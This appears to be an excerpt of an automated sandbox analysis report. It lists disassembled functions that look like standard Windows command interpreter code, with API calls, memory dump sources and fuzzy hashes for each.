                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15391B8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsnicmpfprintfwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3625580822-2781220306
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 6ed0caef093881e3efdd51116f800a1e0a601bf46fd9e76f36002a4f29ef7911
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9798a54e4fc5b33e689a2c9d89df2130ab496e8d723cbfb9f498f453c0192420
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED318261A08A4B82FB14BB42A5002BEF660BB46B94FD44136ED1F177B5DEBCE455C360
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1521FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3809306610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 32f39e6056023f77b891d2fc324f48c2629355fc53235a1e7ae14facd8329ec9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 08B16B66A08A4B81FB50AB15E45067DB7A1FB55B80FC58072DA4F877B0DFBDE442C720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1538C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: wcschr$iswdigit$wcstol
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3841054028-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: ca6420d5fdba69529132c57eae2cea415efa4969de5cacb53eefb84cfc01a183
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE51D226B0466B81FB68AB5594041BDA6A1FF68750BC88773DE5F432F4DFBCA441C220
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1515984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533687
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336A6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D15336EB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1533703
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF7D151260D), ref: 00007FF7D1533722
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1066134489-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 739ea113db7b8f67668758fab7650505954dd704e5e7961a1ceb554f2bd9e5ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4518F26B0864B8AFBA56B21950457EE691EB45B90FC84436DE0F477B4DFBCE440CB20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15189C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 850181435-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0ba5561c39cb0703637671c1dbe0801599e515224e2f0d308e9bfb8045a321cf
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e30f486a492b6204ca4cfe222f6522b4387915627d195f2e6e30a15257811e7a
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC41B032608AC6CAEB709F20D8402EDB7A0FB89744FD54062DA4E47B64CF7CD145C710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15234A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1523514
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523522
                                                                                                                                                                                                                                                                                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1523541
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D152355E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: _get_osfhandle.MSVCRT ref: 00007FF7D1523715
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7D1523770
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15236EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7D1523791
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 4057327938-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: f5fc170e214e881f99cea0fabfbe5265615ab8e2379f29c6985e7ceb24b228fa
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89316126B08A4B86F7947B25940007DFAA0EF89740FD841B7D94F873B5DFBCE8448660
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D153BE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: KEYS$LIST$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 411561164-4129271751
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5a5cd9169d0acb644468e003062e23938e809f2f8255e8309db0a2afc90e2e33
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E216020A0CA0B96FB54BB29A45517DE6A1EF84750FD09233C61F472F5DEFC94448760
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15201B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D15201C4
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D15201D6
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520212
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520228
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D152023C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7D152E904,?,?,?,?,00000000,00007FF7D1523491,?,?,?,00007FF7D1534420), ref: 00007FF7D1520251
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: a3391373296e8198105cb3e6d969587975abc7e44b1258419f39f521a32bd49c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75212E2291978B87F7506BA4E58433CEA90FB4A755FE45277D90F466B0CEFCD4448720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
